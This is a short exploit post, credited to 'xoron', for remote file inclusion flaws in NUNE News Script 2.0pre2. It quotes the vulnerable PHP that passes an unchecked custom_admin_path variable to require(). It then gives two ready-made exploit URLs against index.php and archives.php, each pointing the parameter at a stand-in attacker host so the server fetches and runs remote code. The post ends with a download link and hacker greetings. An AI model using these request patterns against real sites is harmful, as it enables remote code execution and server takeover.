NUNE News Script 2.0pre2 Multiple Remote File Include Vulnerabilities

----------------------------------------------- NUNE News Script (custom_admin_path) Remote File Include Vulnerablity ----------------------------------------------- Author: xoron ----------------------------------------------- Code: if (isset($custom_admin_path))     $special_admin_path = $custom_admin_path; else     $special_admin_path = "news/admin"; require("$special_admin_path/config/nune.conf.php"); ----------------------------------------------- 3xplo!t: www.target.com/[script]/index.php?custom_admin_path=http://evilscript? www.target.com/[script]/archives.php?custom_admin_path=http://evilscript? ----------------------------------------------- download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz ----------------------------------------------- Greetz: str0ke, kacper, GODAttach nukedx'e elveda, kendine iyi bak dostum..! -----------------------------------------------